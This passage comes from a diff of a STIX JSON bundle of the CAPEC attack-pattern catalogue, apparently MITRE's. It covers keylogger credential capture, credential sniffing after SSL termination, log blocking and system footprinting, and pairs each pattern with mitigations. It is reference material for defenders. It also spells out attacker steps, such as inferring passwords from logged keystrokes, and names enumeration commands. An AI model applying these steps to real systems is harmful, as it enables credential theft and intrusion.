[ + "attack-pattern--52103765-d380-42fc-aa4d-a8b24615548a" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Determine which user's credentials to capture: Since this is a more targeted attack, an adversary will first identify a particular user they wish the capture the credentials of.

Experiment

  1. Deploy keylogger: Once a user is identified, an adversary will deploy a keylogger to the user's system in one of many ways.

  2. Techniques
    Send a phishing email with a malicious attachment that installs a keylogger on a user's system
    Conceal a keylogger behind fake software and get the user to download the software
    Get a user to click on a malicious URL that directs them to a webpage that will install a keylogger without their knowledge
    Gain access to the user's system through a vulnerability and manually install a keylogger
  3. Record keystrokes: Once the keylogger is deployed on the user's system, the adversary will record keystrokes over a period of time.

  4. Analyze data and determine credentials: Using the captured keystrokes, the adversary will be able to determine the credentials of the user.

  5. Techniques
    Search for repeated sequences that are following by the enter key
    Search for repeated sequences that are not found in a dictionary
    Search for several backspaces in a row. This could indicate a mistyped password. The correct password can then be inferred using the whole key sequence

Exploit

  1. Use found credentials: After the adversary has found the credentials for the target user, they will then use them to gain access to a system in order to perform some follow-up attack

", + "x_capec_prerequisites": [ + "The ability to install the keylogger, either in person or remote." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Strong physical security can help reduce the ability of an adversary to install a keylogger.", + "id": "course-of-action--ac31ad94-cdd7-4233-9c7b-3341818f95c1", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-568-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--76f04316-3bcf-4941-8aa8-df14017ac277", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--ac31ad94-cdd7-4233-9c7b-3341818f95c1", + "spec_version": "2.1", + "target_ref": "attack-pattern--fab7fb48-4503-4e03-980f-9bc827be929f", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker leverages a tool, device, or program to obtain specific information as provided by a user of the target system. This information is often needed by the attacker to launch a follow-on attack. This attack is different than Social Engineering as the adversary is not tricking or deceiving the user. Instead the adversary is putting a mechanism in place that captures the information that a user legitimately enters into a system. 
Deploying a keylogger, performing a UAC prompt, or wrapping the Windows default credential provider are all examples of such interactions.", + "external_references": [ + { + "external_id": "CAPEC-569", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/569.html" + }, + { + "description": "Input Capture", + "external_id": "T1056", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1056" + } + ], + "id": "attack-pattern--52103765-d380-42fc-aa4d-a8b24615548a", + "modified": "2021-06-24T00:00:00.000Z", + "name": "Collect Data as Provided by Users", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--913426fa-ea1f-43b0-8492-1d363ea109d6" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_parent_of_refs": [ + "attack-pattern--fab7fb48-4503-4e03-980f-9bc827be929f" + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack utilizes a REST(REpresentational State Transfer)-style applications' trust in the system resources and environment to obtain sensitive data once SSL is terminated.", + "external_references": [ + { + "external_id": "CAPEC-57", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/57.html" + }, + { + "external_id": "CWE-300", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/300.html" + }, + { + "external_id": "CWE-287", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/287.html" + }, + { + "external_id": "CWE-693", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/693.html" + }, + { + "description": "Network Sniffing", + "external_id": "T1040", + "source_name": "ATTACK", + "url": 
"https://attack.mitre.org/wiki/Technique/T1040" + } + ], + "id": "attack-pattern--359d056e-6d5c-4d54-97d6-5a9f586bcccf", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Utilizing REST's Trust in the System Resource to Obtain Sensitive Data", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--bdcdc784-d891-4ca8-847b-38ddca37a6ec" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Gain Privileges" + ] + }, + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_example_instances": [ + "The Rest service provider uses SSL to protect the communications between the service requester (client) to the service provider. In the instance where SSL is terminated before the communications reach the web server, it is very common in enterprise data centers to terminate SSL at a router, firewall, load balancer, proxy or other device, then the adversary can insert a sniffer into the communication stream and gather all the authentication tokens (such as session credentials, username/passwords combinations, and so on). The Rest service requester and service provider do not have any way to detect this attack." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Find a REST-style application that uses SSL: The adversary must first find a REST-style application that uses SSL to target. Because this attack is easier to carry out from inside of a server network, it is likely that an adversary could have inside knowledge of how services operate.

Experiment

  1. Insert a listener to sniff client-server communication: The adversary inserts a listener that must exist beyond the point where SSL is terminated. This can be placed on the client side if it is believed that sensitive information is being sent to the client as a response, although most often the listener will be placed on the server side to listen for client authentication information.

  2. Techniques
    Run wireshark or tcpdump on a device that is on the inside of a firewall, load balancer, or router of a network and capture traffic after SSL has been terminated

Exploit

  1. Gather information passed in the clear: If developers have not hashed or encrypted data sent in the sniffed request, the adversary will be able to read this data in the clear. Most commonly, they will now have a username or password that they can use to submit requests to the web service just as an authorized user

", + "x_capec_extended_description": "\n Rest applications premise is that they leverage existing infrastructure to deliver web services functionality. An example of this is a Rest application that uses HTTP Get methods and receives a HTTP response with an XML document. These Rest style web services are deployed on existing infrastructure such as Apache and IIS web servers with no SOAP stack required.\n Unfortunately from a security standpoint, there frequently is no interoperable identity security mechanism deployed, so Rest developers often fall back to SSL to deliver security. In large data centers, SSL is typically terminated at the edge of the network - at the firewall, load balancer, or router. Once the SSL is terminated the HTTP request is in the clear (unless developers have hashed or encrypted the values, but this is rare). The adversary can utilize a sniffer such as Wireshark to snapshot the credentials, such as username and password that are passed in the clear once SSL is terminated. Once the adversary gathers these credentials, they can submit requests to the web service provider just as authorized user do. There is not typically an authentication on the client side, beyond what is passed in the request itself so once this is compromised, then this is generally sufficient to compromise the service's authentication scheme.\n ", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "Opportunity to intercept must exist beyond the point where SSL is terminated.", + "The adversary must be able to insert a listener actively (proxying the communication) or passively (sniffing the communication) in the client-server communication path." 
+ ], + "x_capec_skills_required": { + "Low": "To insert a network sniffer or other listener into the communication stream" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Implement message level security such as HMAC in the HTTP communication", + "id": "course-of-action--411ad2e6-57aa-4f31-be81-4e85c4618602", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-57-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--d6d23a13-264b-4642-b6ca-c39f175c9d9e", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--411ad2e6-57aa-4f31-be81-4e85c4618602", + "spec_version": "2.1", + "target_ref": "attack-pattern--359d056e-6d5c-4d54-97d6-5a9f586bcccf", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Utilize defense in depth, do not rely on a single security mechanism like SSL", + "id": "course-of-action--fab2d0ed-1d80-4531-a345-10e8bbb142d5", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-57-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": 
"relationship--d893b6fe-7c69-4a0a-a687-450db912f094", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--fab2d0ed-1d80-4531-a345-10e8bbb142d5", + "spec_version": "2.1", + "target_ref": "attack-pattern--359d056e-6d5c-4d54-97d6-5a9f586bcccf", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--e8ca2309-7035-4c1b-91a7-0c39f533a82b", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a4112a44-a0f9-4bde-bebe-74ed96c4cd3f", + "spec_version": "2.1", + "target_ref": "attack-pattern--359d056e-6d5c-4d54-97d6-5a9f586bcccf", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This CAPEC has been deprecated because it is not directly related to a weakness, social engineering, supply chains, or a physical-based attack.", + "external_references": [ + { + "external_id": "CAPEC-570", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/570.html" + } + ], + "id": "attack-pattern--80f16e35-c7c1-445d-8f12-a77bbbce6bcf", + "modified": "2020-07-30T00:00:00.000Z", + "name": "DEPRECATED: Signature-Based Avoidance", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_status": "Deprecated", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + 
"description": "\n An adversary prevents host-generated logs being delivered to a central location in an attempt to hide indicators of compromise.\n ", + "external_references": [ + { + "external_id": "CAPEC-571", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/571.html" + }, + { + "description": "Impair Defenses: Disable Windows Event Logging", + "external_id": "T1562.002", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1562/002" + }, + { + "description": "Impair Defenses: Impair Command History Logging", + "external_id": "T1562.002", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1562/002" + }, + { + "description": "Impair Defenses: Indicator Blocking", + "external_id": "T1562.006", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1562/006" + }, + { + "description": "Impair Defenses: Disable Cloud Logs", + "external_id": "T1562.008", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1562/008" + } + ], + "id": "attack-pattern--8f91fa23-b5c4-48f1-be6c-99582524f8cc", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Block Logging to Central Repository", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--2a6131f7-30af-4529-be4e-bc3b7bf22009" + ], + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_extended_description": "\n In the case of network based reporting of indicators, an adversary may block traffic associated with reporting to prevent central station analysis. 
This may be accomplished by many means such as stopping a local process to creating a host-based firewall rule to block traffic to a specific server.\n In the case of local based reporting of indicators, an adversary may block delivery of locally-generated log files themselves to the central repository.\n ", + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n An adversary modifies file contents by adding data to files for several reasons. Many different attacks could “follow” this pattern resulting in numerous outcomes. Adding data to a file could also result in a Denial of Service condition for devices with limited storage capacity.\n ", + "external_references": [ + { + "external_id": "CAPEC-572", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/572.html" + }, + { + "description": "Obfuscated Files or Information:Binary Padding", + "external_id": "T1027.001", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1027/001" + } + ], + "id": "attack-pattern--31b90554-68d8-4950-ac45-89c915a30716", + "modified": "2021-06-24T00:00:00.000Z", + "name": "Artificially Inflate File Sizes", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--f8533ce1-5f23-4660-8f70-1a05af2c70d3" + ], + "x_capec_consequences": { + "Availability": [ + "Resource Consumption (Denial of Service)" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n An adversary could potentially increase file sizes on devices containing limited storage resources, such as SCADA or IOT devices, resulting in denial of service conditions.\n 
" + ], + "x_capec_likelihood_of_attack": "High", + "x_capec_parent_of_refs": [ + "attack-pattern--cbe9fd1f-4b5d-4a3c-b20b-e49888457338" + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary exploits functionality meant to identify information about the currently running processes on the target system to an authorized user. By knowing what processes are running on the target system, the adversary can learn about the target environment as a means towards further malicious behavior.", + "external_references": [ + { + "external_id": "CAPEC-573", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/573.html" + }, + { + "external_id": "CWE-200", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html" + }, + { + "description": "Process Discovery", + "external_id": "T1057", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1057" + } + ], + "id": "attack-pattern--b5b3a4ff-afa0-4a3a-9537-88ac953a41f7", + "modified": "2020-07-30T00:00:00.000Z", + "name": "Process Footprinting", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--87b0d2df-b246-4bf9-aee8-4912e2fa1a30" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Authorization": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Confidentiality": [ + "Other", + "Bypass Protection Mechanism", + "Hide Activities" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "On a Windows system, the command, \"tasklist,\" displays information about processes. 
The same function on a Mac OS system is done with the command, \"ps.\"", + "In addition to manual discovery of running processes, an adversary can develop malware that carries out this attack pattern before subsequent malicious action." + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "The adversary must have gained access to the target system via physical or logical means in order to carry out this attack." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--d90ebca8-a2a7-44f1-afb0-5bf198b230a1", + "modified": "2020-07-30T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--df51abec-081d-46dd-8f72-6ffd3d11d3dc", + "spec_version": "2.1", + "target_ref": "attack-pattern--b5b3a4ff-afa0-4a3a-9537-88ac953a41f7", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary exploits functionality meant to identify information about the services on the target system to an authorized user. By knowing what services are registered on the target system, the adversary can learn about the target environment as a means towards further malicious behavior. 
Depending on the operating system, commands that can obtain services information include \"sc\" and \"tasklist/svc\" using Tasklist, and \"net start\" using Net.", + "external_references": [ + { + "external_id": "CAPEC-574", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/574.html" + }, + { + "external_id": "CWE-200", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html" + }, + { + "description": "System Service Discovery", + "external_id": "T1007", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1007" + } + ], + "id": "attack-pattern--6cfc4047-a0fb-42ac-bf94-226a21c40c80", + "modified": "2020-07-30T00:00:00.000Z", + "name": "Services Footprinting", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--87b0d2df-b246-4bf9-aee8-4912e2fa1a30" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Authorization": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Confidentiality": [ + "Other", + "Bypass Protection Mechanism", + "Hide Activities" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "The adversary must have gained access to the target system via physical or logical means in order to carry out this attack." 
+ ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Identify programs that may be used to acquire service information and block them by using a software restriction policy or tools that restrict program execution by uaing a process allowlist.", + "id": "course-of-action--93c5a458-1b46-4c3f-9f1f-763513e4e117", + "modified": "2020-07-30T00:00:00.000Z", + "name": "coa-574-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ae71c8b1-867e-4d0f-b856-1f1dc4334311", + "modified": "2020-07-30T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--93c5a458-1b46-4c3f-9f1f-763513e4e117", + "spec_version": "2.1", + "target_ref": "attack-pattern--6cfc4047-a0fb-42ac-bf94-226a21c40c80", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary exploits functionality meant to identify information about the domain accounts and their permissions on the target system to an authorized user. By knowing what accounts are registered on the target system, the adversary can inform further and more targeted malicious behavior. 
Example Windows commands which can acquire this information are: \"net user\" and \"dsquery\".", + "external_references": [ + { + "external_id": "CAPEC-575", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/575.html" + }, + { + "external_id": "CWE-200", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html" + }, + { + "description": "Account Discovery", + "external_id": "T1087", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1087" + } + ], + "id": "attack-pattern--6de257d8-e3b6-4654-85a7-a6fb37a94ccb", + "modified": "2020-07-30T00:00:00.000Z", + "name": "Account Footprinting", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--87b0d2df-b246-4bf9-aee8-4912e2fa1a30" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Authorization": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Confidentiality": [ + "Other", + "Bypass Protection Mechanism", + "Hide Activities" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "The adversary must have gained access to the target system via physical or logical means in order to carry out this attack." 
+ ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Identify programs that may be used to acquire account information and block them by using a software restriction policy or tools that restrict program execution by uysing a process allowlist.", + "id": "course-of-action--99081e9b-3b17-47c0-bbc3-23ef66bd5063", + "modified": "2020-07-30T00:00:00.000Z", + "name": "coa-575-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--a83980a6-7bad-41f4-967c-54f888a25a11", + "modified": "2020-07-30T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--99081e9b-3b17-47c0-bbc3-23ef66bd5063", + "spec_version": "2.1", + "target_ref": "attack-pattern--6de257d8-e3b6-4654-85a7-a6fb37a94ccb", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary exploits functionality meant to identify information about user groups and their permissions on the target system to an authorized user. By knowing what users/permissions are registered on the target system, the adversary can inform further and more targeted malicious behavior. 
An example Windows command which can list local groups is \"net localgroup\".", + "external_references": [ + { + "external_id": "CAPEC-576", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/576.html" + }, + { + "external_id": "CWE-200", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html" + }, + { + "description": "Permission Groups Discovery", + "external_id": "T1069", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1069" + }, + { + "description": "Group Policy Discovery", + "external_id": "T1615", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1615" + } + ], + "id": "attack-pattern--f95027a2-27e7-431f-b5c7-da9c46b05f71", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Group Permission Footprinting", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--87b0d2df-b246-4bf9-aee8-4912e2fa1a30" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Authorization": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Confidentiality": [ + "Other", + "Bypass Protection Mechanism", + "Hide Activities" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "The adversary must have gained access to the target system via physical or logical means in order to carry out this attack." 
+ ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Identify programs (such as \"net\") that may be used to enumerate local group permissions and block them by using a software restriction Policy or tools that restrict program execution by using a process allowlist.", + "id": "course-of-action--2bb92dd6-4286-42f9-bb33-e90bf1a8a9d5", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-576-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--66551e96-dd41-445e-855d-1b22ca5c0267", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--2bb92dd6-4286-42f9-bb33-e90bf1a8a9d5", + "spec_version": "2.1", + "target_ref": "attack-pattern--f95027a2-27e7-431f-b5c7-da9c46b05f71", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary exploits functionality meant to identify information about the primary users on the target system to an authorized user. They may do this, for example, by reviewing logins or file modification times. By knowing what owners use the target system, the adversary can inform further and more targeted malicious behavior. An example Windows command that may accomplish this is \"dir /A ntuser.dat\". Which will display the last modified time of a user's ntuser.dat file when run within the root folder of a user. 
This time is synonymous with the last time that user was logged in.", + "external_references": [ + { + "external_id": "CAPEC-577", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/577.html" + }, + { + "external_id": "CWE-200", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html" + }, + { + "description": "System Owner/User Discovery", + "external_id": "T1033", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1033" + } + ], + "id": "attack-pattern--3dfa08af-9677-4a4d-a3f0-a1c5042c9497", + "modified": "2019-09-30T00:00:00.000Z", + "name": "Owner Footprinting", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--87b0d2df-b246-4bf9-aee8-4912e2fa1a30" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Authorization": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Confidentiality": [ + "Other", + "Bypass Protection Mechanism", + "Hide Activities" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "The adversary must have gained access to the target system via physical or logical means in order to carry out this attack.", + "Administrator permissions are required to view the home folder of other users." 
+ ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure that proper permissions on files and folders are enacted to limit accessibility.", + "id": "course-of-action--583c7488-8859-4641-9143-4a55cfb23722", + "modified": "2019-09-30T00:00:00.000Z", + "name": "coa-577-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--8d75f4c7-4ed6-4b8d-92af-9a3ef1ed2ea7", + "modified": "2019-09-30T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--583c7488-8859-4641-9143-4a55cfb23722", + "spec_version": "2.1", + "target_ref": "attack-pattern--3dfa08af-9677-4a4d-a3f0-a1c5042c9497", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary exploits a weakness in access control to disable security tools so that 